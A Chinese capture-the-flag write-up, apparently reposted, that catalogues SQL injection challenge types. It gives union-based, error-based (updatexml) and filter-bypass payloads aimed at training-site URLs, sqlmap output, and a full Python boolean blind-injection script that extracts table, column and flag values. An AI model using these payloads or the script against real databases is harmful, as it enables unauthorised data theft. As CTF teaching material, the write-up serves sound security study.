前言
正文
无过滤带回显的情况
手工注入
4. 注入出当前数据库所有的表名
id=-2' union select 1,2,3,(selectgroup_concat(table_name) from information_schema.tables wheretable_schema=database())#
5.注入出某一个表中的全部列名
id=-2' union select1,2,3,(select group_concat(column_name) from information_schema.columns wheretable_name='fl4g')#
SQLmap注入
执行结果
---
Parameter: id (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 ANDtime-based blind
Payload: id=1' AND SLEEP(5)AND 'ShhA'='ShhA
Type: UNION query
Title: Generic UNION query(NULL) - 4 columns
Payload: id=-2292' UNION ALLSELECTCONCAT(0x716b716b71,0x45784b6e4e78446d737053476e4c4875704c6a58414e444171676264674f634d436c506f554d636b,0x71766a7671),NULL,NULL,NULL--EKPR
---
3. 获取所有的数据库名
万能密码
万能密码2
过滤一部分的情况
union绕过型
2.爆表
这个到后面的操作都需要用到=，但是=被过滤，所以需要等价符号来取代，具体绕过方法看我的另一篇博文。
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where !(table_schema <>database())),0x7e),1) or '1
在本次的环境中 REGEXP 也可以用来取代=。
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(table_name) from information_schema.tables where table_schemaREGEXP database()),0x7e),1) or '1
3. 爆字段
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectgroup_concat(column_name) from information_schema.columns where table_nameREGEXP 'ffll44jj' ),0x7e),1) or '1
4.爆内容
username=admin' or updatexml/*&password=*/(1,concat(0x7e,(selectvalue from ffll44jj ),0x7e),1) or '1
小结
遇到 sql 注入不要慌，恩。
Sql异或注入
1. 爆表:
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1, group_concat(table_name) frominfoorrmation_schema.tables where table_schema=database() --+
2. 爆字段
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1, group_concat(column_name) frominfoorrmation_schema.columns where table_name='flag1'--+
3. 爆数据
http://123.206.87.240:9004/1ndex.php
?id=-2' uniounionn selecselectt 1,flag1 from flag1--+
1.爆表
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('_',(select group_concat(table_name) frominformation_schema.tables where table_schema=database()),'_'),1) --+
XPATH syntax error: ',flag2_'
2.爆字段
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('~',(select group_concat(column_name)from information_schema.columns where table_name='flag2'),'~'),1) --+
XPATH syntax error: '~flag2,address~'
3.爆内容
http://123.206.87.240:9004/Once_More.php
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),1) --+
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'
Sql盲注
#!/usr/bin/env python3
# coding:utf-8
# power by jedi
import requests
headers = {
    # NOTE(review): "POST" is not an HTTP header name; this entry looks like a
    # pasted request line. requests presumably sends it verbatim as a header
    # named "POST", which is harmless for the oracle but a distinctive artefact
    # in the server's access logs.
    "POST":"/web/earnest/index.php HTTP/1.1",
    "Host":"ctf5.shiyanbar.com",
    "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101Firefox/52.0",
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding":"gzip, deflate"
}
# Challenge endpoint; the same path as the "POST" entry above.
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
# Marker text the page shows when the injected condition is TRUE; every probe
# below uses its presence in the response as the boolean oracle.
str_right = "You are in"
# Candidate alphabet tried, in this order, at each character position.
guess ="abcdefghijklmnopqrstuvwxyz0123456789~+=-*/{}?!:@#$&[]._ "
def get_database_name_length():
    """Probe the length of ``database()`` through the boolean oracle.

    Each request asserts ``length(database())=N`` for an increasing N and the
    first response containing ``str_right`` (the TRUE marker) ends the search.
    The doubled keyword ``oorr`` only makes sense against a filter that deletes
    ``or`` a single time; on the server side a parameterized query, not a
    keyword blacklist, is the fix, and the doubled spelling is itself an easy
    log/WAF signature.

    Returns:
        int: the first N for which the oracle reported TRUE.

    Unlike the other probes in this file there is no ``try``/``except`` and no
    upper bound: a request error propagates, and an oracle that never returns
    TRUE loops forever.
    """
    print("get_database_name_length start...")
    candidate = 0
    while True:
        form = {
            'id': f"0'oorr(length(database())={candidate})oorr'0",
            "submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2",
        }
        body = requests.post(url, data=form, headers=headers, timeout=3).text
        if str_right in body:
            print(f"databasename length: {candidate}")
            return candidate
        candidate += 1
def get_database_name():
    """Recover ``database()`` one character at a time via the boolean oracle.

    For every position 1..``database_name_length`` each character of ``guess``
    is asserted with ``mid(...)`` until the TRUE marker appears; the first hit
    is appended and the position advances. The length is hard-coded to 18
    (the call to ``get_database_name_length()`` is left commented out), so a
    different target needs that constant changed. A request error is printed
    and the remaining candidates for that position are still tried; a position
    with no hit is silently skipped, which shifts every later character.

    Prints one line per recovered position and the final name; returns None.
    """
    print("get_database_namestart...")
    # database_name_length =get_database_name_length()
    database_name_length = 18
    database_name = ""
    for position in range(1, database_name_length + 1):
        for candidate in guess:
            form = {
                'id': f"0'oorr(mid((database())from({position})foorr(1))='{candidate}')oorr'0",
                "submit": "%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2",
            }
            try:
                body = requests.post(url, data=form, headers=headers, timeout=3).text
            except Exception as err:  # best-effort: report and try the next candidate
                print(err)
                continue
            if str_right in body:
                database_name += candidate
                print(f"{position}--------{candidate}")
                break
    print(f"databasename:{database_name}")
def get_table_name():
    """Recover the comma-joined table list of the current schema character by character.

    Positions 1..30 of ``group_concat(table_name)`` are probed against the
    ``guess`` alphabet with the same TRUE-marker oracle as the other helpers.
    ``infoorrmation_schema`` and ``foorr`` exist to survive a filter that
    strips ``or`` once; they are also the kind of token a request-log search
    or WAF rule can key on. Request errors are printed and the loop goes on;
    a position with no hit is skipped without notice. Note that the 30-character
    cap truncates longer lists, and this probe sends no ``submit`` field.

    Prints one line per recovered position and the accumulated names; returns None.
    """
    print("get_table_namestart...")
    table_names = ""
    for position in range(1, 31):
        for candidate in guess:
            form = {
                "id": f"0'oorr((select(mid(group_concat(table_name)from({position})foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='{candidate}')oorr'0",
            }
            try:
                body = requests.post(url, data=form, headers=headers, timeout=3).text
            except Exception as err:  # best-effort: report and try the next candidate
                print(err)
                continue
            if str_right in body:
                table_names += candidate
                print(f"{position}--------{candidate}")
                break
    print(f"tablenames:{table_names}")
'''
1--------f
2--------i
3--------a
4--------g
6--------u
7--------s
8--------e
9--------r
10--------s
'''
def get_column_name():
    """Recover the comma-joined column list of table ``fiag`` character by character.

    Same oracle loop as ``get_table_name`` (positions 1..30, ``guess`` alphabet,
    errors printed and skipped), but the query reads ``information_schema.columns``
    with the table name fixed to ``'fiag'``. The final print still says
    ``tablenames:`` — that label is kept exactly as in the original.

    Prints one line per recovered position and the accumulated names; returns None.
    """
    print("get_column_name")
    column_name = ""
    for position in range(1, 31):
        for candidate in guess:
            form = {
                "id": f"0'oorr((select(mid(group_concat(column_name)from({position})foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='{candidate}')oorr'0",
            }
            try:
                body = requests.post(url, data=form, headers=headers, timeout=3).text
            except Exception as err:  # best-effort: report and try the next candidate
                print(err)
                continue
            if str_right in body:
                column_name += candidate
                print(f"{position}--------{candidate}")
                break
    # Label reproduced verbatim from the original, although this is the column list.
    print(f"tablenames:{column_name}")
'''
1--------f
2--------l
3--------$
4--------4
5--------g
'''
def dump_flag():
    """Read column ``fl$4g`` of table ``fiag`` character by character via the oracle.

    Positions 1..30 are probed against ``guess``; each hit is printed as it is
    found. Unlike the other helpers there is no summary print at the end, so
    the value only appears in the per-position progress lines (and is never
    returned). Request errors are printed and the remaining candidates are
    still tried.

    Returns None.
    """
    print("dump_flag")
    flag = ""
    for position in range(1, 31):
        for candidate in guess:
            form = {
                "id": f"0'oorr((select(mid((fl$4g)from({position})foorr(1)))from(fiag))='{candidate}')oorr'0",
            }
            try:
                body = requests.post(url, data=form, headers=headers, timeout=3).text
            except Exception as err:  # best-effort: report and try the next candidate
                print(err)
                continue
            if str_right in body:
                flag += candidate
                print(f"{position}-----{candidate}")
                break
def main():
    """Script entry point: run only the final stage, ``dump_flag()``.

    The earlier stages are left commented out; each one prints what it finds,
    and the results feed the hard-coded names (``fiag``, ``fl$4g``) used below.
    """
    # get_database_name_length()
    # get_table_name()
    # get_column_name()
    dump_flag()
if __name__ == '__main__':
    # Only run when executed directly, not when imported.
    main()
小结:sql盲注一般先要判断盲注的类型,然后判断被过滤的关键字,再然后关键字绕过,最后编码。
转载自:https://blog.csdn.net/huanghelouzi/article/details/82999684
本文始发于微信公众号(LemonSec):CTF中SQL注入常见题型整理